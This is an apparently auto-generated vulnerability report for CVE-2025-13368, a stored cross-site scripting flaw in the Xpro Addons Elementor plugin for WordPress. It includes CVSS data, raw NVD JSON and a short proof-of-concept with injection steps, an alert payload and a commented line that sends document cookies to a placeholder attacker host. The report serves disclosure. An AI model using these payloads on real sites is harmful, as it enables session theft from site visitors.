Security Vulnerability Report
中文
CVE-2025-13368 CVSS 6.4 MEDIUM

CVE-2025-13368

Published: 2026-04-04 08:16:04
Last Modified: 2026-04-24 18:13:29

Description

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Widget's 'onClick Event' setting in all versions up to, and including, 1.4.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xpro Addons — 140+ Widgets for Elementor <= 1.4.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-13368: Stored XSS in Xpro Addons Pricing Widget // 1. Log in as a user with 'Contributor' role or higher. // 2. Edit a page and add the 'Pricing Table' widget from Xpro Addons. // 3. In the widget settings, locate the 'Button Link' or 'onClick Event' field. // 4. Inject the following payload into the onClick Event field: javascript:alert('CVE-2025-13368_XSS'); // 5. Publish/Update the page. // 6. Visit the page as a regular user or admin. The alert should trigger. // Example payload to steal current user cookies (demonstration purpose only) // javascript:fetch('http://attacker-site.com/?c='+document.cookie);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13368", "sourceIdentifier": "[email protected]", "published": "2026-04-04T08:16:04.117", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Widget's 'onClick Event' setting in all versions up to, and including, 1.4.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3432667/xpro-elementor-addons", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d83ae3a4-382f-4e64-bf1e-73f953f2f654?source=cve", "source": "[email protected]"}]}}